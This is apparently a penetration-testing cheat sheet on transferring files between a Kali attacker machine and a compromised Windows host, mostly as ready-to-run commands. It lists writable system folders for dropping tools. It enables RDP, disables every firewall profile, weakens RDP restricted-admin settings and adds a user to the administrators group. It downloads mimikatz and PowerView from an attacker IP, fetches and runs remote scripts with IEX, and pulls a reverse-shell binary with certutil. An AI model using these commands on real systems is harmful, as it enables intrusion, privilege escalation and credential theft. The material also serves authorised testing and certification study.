Placing files in writeable paths
The following folders are by default writable by normal users (depends on Windows version - This is from W10 1803)
Copy C:\Windows\Tasks
C:\Windows\Temp
C:\windows\tracing
C:\Windows\Registration\CRMLog
C:\Windows\System32\FxsTmp
C:\Windows\System32\com\dmp
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\PRINTERS
C:\Windows\System32\spool\SERVERS
C:\Windows\System32\spool\drivers\color
C:\Windows\System32\Tasks\Microsoft\Windows\SyncCenter
C:\Windows\System32\Tasks_Migrated (after peforming a version upgrade of Windows 10)
C:\Windows\SysWOW64\FxsTmp
C:\Windows\SysWOW64\com\dmp
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\SyncCenter
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\PLA\System SMB
On Kali, extract the tools.zip archive to a directory. Change to this directory and run either of the following to set up an SMB server:
Copy python3 /usr/share/doc/python3-impacket/examples/smbserver.py tools .
python /usr/share/doc/python-impacket/examples/smbserver.py tools . Support for smb2
Copy python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support tools $(pwd) To copy files from Kali to Windows:
Copy copy \\192.168.1.11\tools\file.ext file.ext To copy files from Windows to Kali:
Copy copy file.ext \\192.168.1.11\tools\file.ext Connecting from Windows to Kali SMB
Copy # Kali - host SMB share
$ python3 /usr/share/doc/python3-impacket/examples/smbserver.py [sharename] [/path/to/share] # setup local share
# Target - connect to share
cmd> net view \\[kali] # view remote shares
cmd> net use \\[kali]\[share] # connect to share
cmd> copy \\[kali]\[share]\[src_file] [/path/to/dest_file] # copy file RDP
Enable RDP Powershell:
Copy Set-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server' -Name "fDenyTSConnections" -Value 0
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
or
reg add "HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
Enable-NetFirewallRule -DisplayGroup "Remote Desktop" Connect using xfreerdp:
Copy xfreerdp /u:<USERNAME> /p:<PASSWORD> /v:<TARGET_IP>
proxychains xfreerdp /u:<USERNAME> /p:<PASSWORD> /v:<TARGET_IP> If RDP is available (or we can enable it), we can add our low privileged user to the administrators group and then spawn an administrator command prompt via the GUI:
Copy > net localgroup administrators <username> /add Enable RDP and add User to:
Copy reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
netsh advfirewall set allprofiles state off
net localgroup "remote desktop users" alice /add Powershell .ps1
This is a simple powershell script to download files:
Copy $baseUrl = "http://192.168.119.139/"
$fileNames = @("PowerUP.ps1", "PowerView.ps1", "mimikatz.exe", "winPEASany.exe")
$downloadPath = "C:\Winodws\Tasks"
foreach ($fileName in $fileNames) {
$url= $baseUrl + $fileName
$filePath = Join-Path $downloadPath $fileName
Invoke-WebRequest -Uri $url -OutFile $filePath
Write-Host "Downloaded $fileName to $filePath"
} Powershell
Copy # Download file from remote to local
powershell -c (New-Object Net.WebClient).DownloadFile('http://[host]:[port]/[file]', '[file]')
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.11.0.4/wget.exe','C:\Users\offsec\Desktop\wget.exe')"
# Execute remote PS script
PS> IEX (New-Object System.Net.WebClient).DownloadString('http://[kali]/[script].ps1') IWR
From Windows:
Copy IWR -Uri http://KALI_IP:PORT -OutFile C:\Path\To\File Certutil
From kali:
Copy python3 -m http.server 9999 From Windows CMD:
Copy certutil -urlcache -split -f http://<kali_ip>:9999/shell_445.exe C:\\Windows\\Tasks\\shell_445.exe Bitsadmin
From Windows cmd:
Copy bitsadmin /transfer badthings http://[kali]:[port]/[src_file] [dest_file] SSH server
Let’s download a file to our Kali box using SCP. Start a SSH server if it is not already running
Copy systemctl start ssh.socket
Copy # Download from Kali
scp <username>@<kali_ip>:C:/Windows/Tasks/file.txt .
# Upload from Target
scp /tmp/linpeas.out kali@<kali_ip>:/home/kali/Offensive/PGs/ Netcat
Windows:
Copy C:\Users\offsec> nc -nlvp 4444 > incoming.exe
listening on [any] 4444 ... Kali:
Copy kali@kali:~$ locate wget.exe
/usr/share/windows-resources/binaries/wget.exe
kali@kali:~$ nc -nv 10.11.0.22 4444 < /usr/share/windows-resources/binaries/wget.exe
(UNKNOWN) [10.11.0.22] 4444 (?) open The connection is received by Netcat on the Windows machine as shown below:
Copy C:\Users\offsec> nc -nlvp 4444 > incoming.exe
listening on [any] 4444 ...
connect to [10.11.0.22] from <UNKNOWN) [10.11.0.4] 43459
^C
C:\Users\offsec> Socat
Alice wants to share a file with Bob:
Copy kali@kali:~$ sudo socat TCP4-LISTEN:443,fork file:secret_passwords.txt Bob downloads the file from Alice host:
Copy C:\Users\offsec> socat TCP4:10.11.0.4:443 file:received_secret_passwords.txt,create Servers
Python2
Copy python -m SimpleHTTPServer 7331 Python3
Copy python3 -m http.server 7331 PHP
Ruby
Copy ruby -run -e httpd . -p 9000 Busybox
Copy busybox httpd -f -p 10000 